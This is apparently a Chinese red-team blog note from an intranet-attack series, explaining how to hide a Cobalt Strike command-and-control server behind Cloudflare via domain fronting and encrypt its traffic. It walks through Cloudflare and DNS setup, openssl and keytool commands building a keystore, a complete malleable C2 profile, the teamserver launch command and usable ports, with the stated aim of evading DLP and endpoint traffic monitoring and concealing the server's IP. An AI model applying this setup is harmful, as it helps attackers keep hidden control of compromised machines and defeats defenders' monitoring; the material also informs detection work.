合集 – 内网(7)
1.内网提权03-292.windows权限维持03-293.linux权限维持03-294.vulntarget-e内网靶场笔记03-29
5.c2隐藏&流量加密05-216.todesk利用上线04-217.远程下载上传命令(绕过大小限制)09-07

收起

c2隐藏&流量加密

参考链接

参考文章:
https://webxxe.cn/index.php/archives/238/
c2profile随机生成脚本：
https://github.com/threatexpress/random_c2_profile
https://github.com/RedSiege/C2concealer
C2concealer使用：https://www.freebuf.com/articles/network/330713.html
检查profile文件和注意事项：https://webxxe.cn/index.php/archives/209/
国外购买域名(免备案)：https://porkbun.com/checkout/search
国外免费域名(免备案)：但是我感觉不好用，没什么域名https://www.freenom.com/zh/index.html?lang=zh

前言

域前置技术主要通过CDN节点将流量转发给真实的C2服务器，CDN节点ip可通过识别请求的Host头进行流量转发，利用我们配置域名的高可信度，那么就可以有效躲避针对DLP、agent等流量监测并且隐藏ip
虽然Cobalt Strike流量自带SSL证书, 不过大多数情况下都会被杀软查杀, 因此需要自行配置证书来进行加密

过程

域前置配置

1、先购买一个域名

2、打开cloudflare 添加站点-填写刚刚获得的域名

https://dash.cloudflare.com/
(1)选择免费-确认


(2)dns-Records-添加两条记
注意：
这里折磨了好久，这里的name是不能随便填的，一个填www，一个填域名，不然后面ping不通

3、回到域名购买的网站，来到域名管理页面找到NS

把上面两个域名填上去

4.cloudflare左边选择SSL/TLS:改成灵活，因为在国内完全会很慢

(2)创建证书


(3)创建后记下证书和私钥

(4)左边配置-发展模式勾上

(5)** **左边规则 – 添加两个规则 – 选择缓存级别 – 选择绕过 – 保存

5.最后可以ping一下域名看看

最开始是ping都解析不到ip，但是后面发现是dns的name没填好（上面有说）

后面能解析到ip了但是一直请求超时，访问了我的域名，cloudfflare报错522，谷歌搜了一下，可能是cloudflare请求不了我的服务器，就想起了可能端口没开策略给ping

打开后果然可以了

自行配置证书流量加密

6.到kali里面生成证书文件

打开kali，创建server.pem文件，粘贴证书

创建 server.key, 粘贴刚刚保存的私钥

生成 c2 证书
openssl pkcs12 -export -in server.pem -inkey server.key -out cfcert.p12 -name cloudflare_cert -passout pass:yftk123
创建一个 store
keytool -importkeystore -deststorepass yftk123 -destkeypass yftk123 -destkeystore cfcert.store -srckeystore cfcert.p12 -srcstoretype PKCS12 -srcstorepass yftk123 -alias cloudflare_cert
可以修改密码，但要两条命令保持一致

7、创建 c2 配置文件 cdn.profile

https-certificate {
set keystore "cfcert.store";
set password "yftk123";
}
http-config {
header "Content-Type" "application";
}
http-stager {
set uri_x86 "/api/1";
set uri_x64 "/api/2";
client {
header "Host" "xxx.com";}
server {
output{
print;
}
}
}
http-get {
set uri "/api/3";
client {
header "Host" "xxx.com";
metadata {
base64;
header "Cookie";
}
}
server {
output{
print;
}
}
}
http-post {
set uri "/api/4";
client {
header "Host" "xxx.com";
id {
uri-append;
}
output{
print;
}
}
server {
output{
print;
}
}
}

主要修改下图这些

8、cs设置

这两个文件复制到服务器，然后给权限

启动cs
./teamserver ip pass cdn.profile

注意一下这个
Cloudflare支持的HTTP端口是： 80,8080,8880,2052,2082,2086,2095
Cloudflare支持的HTTPs端口是： 443,2053,2083,2087,2096,8443
新建监听器

9、上线成功，ip是cdn服务器且流量已加密